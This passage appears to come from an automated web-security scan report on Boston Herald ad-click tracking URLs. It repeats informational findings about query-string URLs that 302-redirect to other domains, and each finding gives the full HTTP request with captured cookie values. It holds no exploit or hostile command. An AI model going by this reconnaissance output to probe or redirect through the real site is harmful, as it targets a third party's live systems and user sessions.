<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1194202561/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1194202561?">here</a>
...[SNIP]...

17.231. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1217332109/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1217332109/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1217332109/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

17.232. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1258879011/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1258879011/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1258879011/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

17.233. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618?
Content-Length: 600
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1301504618/Middle1/BostonHerald/quadrant1_entHP300x250b_2010/quadrant1_entHP300x250b_2010.html/72634857383031444f386b4144567663?;ord=1301504618?">here</a>
...[SNIP]...

17.234. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042?
Content-Length: 596
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1382555042/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=1382555042?">here</a>
...[SNIP]...

17.235. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/178441265/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/178441265/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/178441265/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:07:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

17.236. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647?
Content-Length: 594
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/181134647/Middle/BostonHerald/quadrant1_entROS300x250a_2010/quadrant1_edgeROS300x250a_0608.html/72634857383031444f386b4144567663?;ord=181134647?">here</a>
...[SNIP]...

17.237. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1852599113/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1852599113/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1852599113/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

17.238. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2058755968/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2058755968/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2058755968/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

17.239. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578?
Content-Length: 597
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2097867578/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=2097867578?">here</a>
...[SNIP]...

17.240. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2124335020/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2124335020/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2124335020/Top/BostonHerald/BostonBlazers_ROS_728x90/heraldleaderboard.jpg/72634857383031444f386b4144567663?x HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857
Content-Length: 342
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ticketmaster.com/Boston-Blazers-tickets/artist/821857">here</a>
...[SNIP]...

17.241. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:08:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?
Content-Length: 599
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.collective-media.net/jump/q1.bosherald/be_ent;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/2134060438/Middle1/BostonHerald/quadrant1_entROS300x250b_2010/quadrant1_entROS300x250b_2010.html/72634857383031444f386b4144567663?;ord=2134060438?">here</a>
...[SNIP]...

17.242. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?http://a.collective-media.net/jump/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/269011797/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/72634857383031444f386b4144567663?;ord=269011797? HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
